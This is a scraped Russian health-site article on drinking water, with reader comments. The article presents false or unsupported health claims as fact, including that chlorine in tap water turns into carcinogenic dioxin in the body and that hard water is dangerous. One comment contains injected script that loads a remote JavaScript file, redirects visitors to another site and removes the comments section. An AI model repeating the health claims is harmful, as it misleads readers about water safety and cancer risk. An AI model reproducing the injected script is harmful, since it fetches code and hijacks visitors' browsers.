Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Такая непростая простая в...  >>  Такая непростая простая вода
 
Обратная связь
 

Такая непростая простая вода

Размер шрифта
04 апреля 2012 09:50
  • google_analytics: false
  • Нравится

Вода – основа жизни, в воде и благодаря воде зародилась жизнь. Что такое вода и почему она так важна для человека?

Польза воды

С точки зрения химии и физики, вода может пребывать в трех физических состояниях: и в кристаллическом, и в жидком, и в газообразном. В природе другого такого соединения просто не существует.

Человек на 78-85% состоит из воды. Именно с водой связаны все химические реакции нашего организма, и если человек может долго оставаться без пищи, то без воды он не проживет и 3-5 дней. Потеря 10% массы тела для человека не такая большая проблема, а вот потеря 10% жидкости приводит к тяжелым последствиям, например токсикозу или летальному исходу.

Количество воды в организме определяет объем циркулирующей крови. От этого объема зависит состояние сердца и сосудов, артериальное давление человека, состояние мочеполовой системы и работа кишечника. Воду можно назвать определяющей структурой нашей жизнедеятельности.

Пьедестал почета по уровню безопасности воды

  • Бутилированная
  • Водопроводная
  • Родниковая

Что важно знать

  • От количества выпитой жидкости зависит объем циркулирующей крови и правильный баланс электролитов.
  • Нормальный объем воды в организме обеспечит бесперебойную работу кишечника и отсутствие запоров.
  • 2 литра выпитой воды в день – хорошая профилактика рака мочевого пузыря.

Как выбрать

Если вода в регионе хлорированная, то житель такого региона употребляет с водой из водопровода 15 кг хлора в течение жизни. Хлор превращается в организме в канцероген диоксин, который и вызывает рак.

В некоторых регионах вода фторированная. Особенно это касается Ленинградской и Нижегородской областей, Мордовии, Западной Сибири. Чрезменое количество фтора разрушает кости.

В так называемой жесткой воде много минералов, что тоже опасно для организма. 

Для питья и приготовления пищи выбирайте очищенную воду.

Как хранить

Хранить питьевую воду нужно в стеклянной таре. Стекло – самый инертный, лишенный активности, материал. Также можно хранить в специальной пластиковой таре. Нельзя хранить воду в упаковках или бутылках из-под соков, молока и других жидкостей. Эффективно удалить белки и сахар из такой тары невозможно. В этой среде рано или поздно начнут размножаться микробы.

Нельзя хранить воду в фильтре. После фильтрации ее необходимо сливать в стеклянную тару. 

80% хлора из 2-х литров хлорированной воды в открытой таре улетучивается за 1,5 часа.

Как пить

Нужно выпивать 2 литра очищенной воды в сутки.


Сюжеты по теме:
Питьевая вода. Важнее, чем еда

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - helena

04 апреля 2012 в 17:25

Цитировать   |   Пожаловаться

Вот Вы пишете: "С точки зрения химии и физики, вода может пребывать в трех физических состояниях: и в кристаллическом, и в жидком, и в газообразном. В природе другого такого соединения просто не существует."

Исходя из Вашей фразы отличительные свойства воды именно в этом и проявляются.

Все это сформулировано бестолково и фактически не так. Во-первых, не "физических состояния" а агрегатных состояния, надо бы знать такой термин, все же в школе это проходят (и не пребывать, так о людях говорят, а находиться).

Далее: все, существующие в природе и искусственно синтезированные соединения, имеющие как небольшой молекулярный вес, так и достаточно большой, в несколько сотен, могут быть и в виде газа, поскольку имеют температуру кипения, и в виде твердого вещества, и в виде жидкого, поскольку все имеют температуру плавления. Все эти температуры сведены в справочники и доступны. 

helena 04 апреля 2012 в 17:25
агрегатных состояния
 Спасибо Вам за как всегда ценные сведения.

3 - zzzzzz

30 июня 2015 в 23:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Вся правда об острой кишечной инфекции   Как пережить жару дома   Лучшая природная вода для здоровья   Лучшая еда после застолья  
02 мая 2013Чем мыть ребенка, чтобы не испортить его кожу 12 апреля 2013Ученые выяснили, из каких кружек лучше пить
 
20 марта 2013А вы знаете, почему пальцы сморщиваются после пребывания в воде 21 декабря 2012Сладкая вода помогает сконцентрироваться
 

Слайдшоу

1
Ошибки в еде, которые вы точно делаете!
Как пережить жару без кондиционера?!
Как есть и худеть?

Тесты

1
Что вы знаете о воде?
Есть ли у вас избыточный вес?
Цистит: как с ним бороться
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.